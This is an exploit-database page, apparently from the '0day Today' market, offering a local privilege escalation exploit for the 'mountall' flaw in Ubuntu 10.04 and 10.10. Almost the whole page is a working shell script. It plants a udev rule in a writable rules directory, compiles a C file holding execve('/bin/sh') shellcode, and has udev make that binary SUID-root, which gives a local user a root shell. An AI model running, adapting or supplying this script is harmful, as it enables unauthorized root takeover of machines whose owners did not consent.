[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability

Author
fuzz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14148
Category
local exploits
Date add
22-09-2010
Platform
linux
================================================================
Ubuntu Linux 'mountall' Local Privilege Escalation Vulnerability
================================================================

#!/bin/sh
# by fuzz. For Anux inc. #
# ubuntu 10.04 , 10.10
if [ -z "$1" ]
then
        echo "usage: $0 <UDEV KERNEL EVENT>"
        echo "see here http://www.reactivated.net/writing_udev_rules.html"
        exit
fi
cat > usn985-exploit.sh << EOF
#!/bin/sh
chown root:root $PWD/usn985-sc
chmod +s $PWD/usn985-sc
EOF
cat > usn985-sc.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){int *r;*((int *)&r+2)=(int)s;}
EOF
gcc usn985-sc.c -o usn985-sc
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn985-exploit.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)"
echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root"



#  0day.today [2024-12-27]  #